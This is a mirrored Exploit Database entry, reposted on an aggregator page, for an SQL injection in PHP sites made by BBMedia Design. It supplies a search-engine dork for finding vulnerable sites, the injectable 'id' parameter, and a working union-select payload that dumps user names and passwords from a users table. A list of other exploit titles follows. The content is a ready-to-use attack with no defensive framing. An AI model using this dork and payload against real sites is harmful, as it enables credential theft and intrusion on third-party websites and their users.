BBMedia Design’s – SQL Injection

Exploit Database
83 阅读

作者： XroGuE

日期： 2010-05-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12711/

=========================================================
BBMedia Design's SQL Injection Vulnerability
=========================================================
##########################################
# Name: BBMedia Design's SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: http://www.bbmedia.org
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext:"Design by BB Media.Org"

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]

[+] Demo: http://server/prod_motors.php?id=-999+union+all+select+1,2,3,4,5,group_concat(id,0x3a,user,0x3a,pass),7,8,9,10,11,12+from+users

##########################################

last Exploits
BBMedia Design’s – SQL Injection的更多信息

OrangeHRM 2.7 RC – ‘/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus’ Cross-Site Scripting：
eScan Management Console 14.0.1400.2281 – SQL Injection (Authenticated)：
Oracle WebLogic Server 14.1.1.0 – RCE (Authenticated)：
Ajenti 2.1.31 – Remote Code Execution：
ImpressCMS v1.4.3 – Authenticated SQL Injection：
B2B Classic Trading Script – ‘offers.php’ SQL Injection：
phpMyAdmin 4.8 – Cross-Site Request Forgery：
WonderCMS 3.1.3 – ‘page’ Persistent Cross-Site Scripting：